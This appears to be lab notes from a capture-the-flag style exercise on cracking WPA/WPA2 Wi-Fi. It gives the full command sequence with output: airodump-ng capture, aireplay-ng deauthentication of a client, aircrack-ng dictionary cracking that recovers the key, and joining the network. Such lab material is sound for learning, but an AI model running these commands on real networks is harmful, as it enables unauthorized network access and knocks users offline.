WPA/WPA2 CRACKING
root@thm:~$ ssh [email protected]
#set the link to monitor mode
glitch@wifi:~$ sudo ip link set dev wlan2 down
glitch@wifi:~$ sudo iw dev wlan2 set type monitor
glitch@wifi:~$ sudo ip link set dev wlan2 up
glitch@wifi:~$ sudo iw dev wlan2 info
#start capturing traffic and targets
glitch@wifi:~\tab1$ sudo airodump-ng wlan2
* By default, airodump-ng will automatically switch the selected wireless interface into monitor mode if the interface supports it.
BSSID STATION PWR Rate Lost Frame Notes Probes
02:00:00:00:00:00 02:00:00:00:01:00 -29 0 - 1 0 1
* the STATION section shows the device's BSSID (MAC) of 02:00:00:00:01:00 that is connected to the access point.
glitch@wifi:~\tab1$ CTRL+C
* stop traffic capture once a target BSSID is acquired
#capture 4-way handshakes
glitch@wifi:~\tab1$ sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2
* This command targets the specific network channel and MAC address (BSSID) of the access point for which you want to capture the traffic and saves the information to a few files that start with the name output-file.
- These files will be used to crack the PSK
* -c represents the channel
* --bssid represents the AP
* It is important to leave this command running until the attack is finished
...
CH 6 ][ Elapsed: 7 mins ][ 2024-12-13 00:34 ][ WPA handshake: 02:00:00:00:00:00
#deauthenticate the connected client(s)
glitch@wifi:~\tab2$ sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
CH 6 ][ Elapsed: 7 mins ][ 2024-12-13 00:34 ][ WPA handshake: 02:00:00:00:00:00
* this cmd will deauthenticate the connected client
- the airodump cmd will then capture the 4-way handshake soon as the client reconnects to the AP
* The -0 flag indicates using the deauthentication attack
* The 1 value is the number of deauths to send.
* The -a indicates the BSSID of the access point and
* The -c indicates the BSSID of the client to deauthenticate.
# once the "WPA Hanshake" is acquired; the monitoring can be stopped
glitch@wifi:~\tab1$ CTRL+C
* monitoring MUST be stopped because it won't be possible to join the Wi-Fi network while airodump-ng is running
in monitor mode
#break
glitch@wifi:~\tab1$ sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
* the -a 2 flag indicates the WPA/WPA2 attack mode.
* The -b indicates the BSSID of the access point
* the -w flag indicates the dictionary list to use for the attack.
* KEY FOUND! [ fluffy/champ24 ]
* If you get a msg stating "no EAPOL data; unable to process this AP error", this means that you
ran aircrack-ng prior to the handshake being captured or that the handshake was not captured at all
glitch@wifi:~$ wpa_passphrase MalwareM_AP 'ENTER PSK HERE' > config
network={
ssid="MalwareM_AP"
#psk="fluffy/champ24"
psk=b6539a718cc4745fe326498237746509bec562ce43c468a7b48f8ce698ee1ccb
}
glitch@wifi:~$ sudo wpa_supplicant -B -c config -i wlan2
Successfully initialized wpa_supplicant
rfkill: Cannot get wiphy information
* If you get a rfkill: Cannot get wiphy information error, you can ignore it.
- You will also notice that wpa_supplicant has automatically switched our wlan2 interface to managed mode.
#verify
glitch@wifi:~$ iw dev
phy#2
Unnamed/non-netdev interface
wdev 0x200000002
addr 42:00:00:00:02:00
type P2P-device
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
ssid MalwareM_AP
type managed
channel 6 (2437 MHz), width: 20 MHz (no HT), center1: 2437 MHz
txpower 20.00 dBmLast updated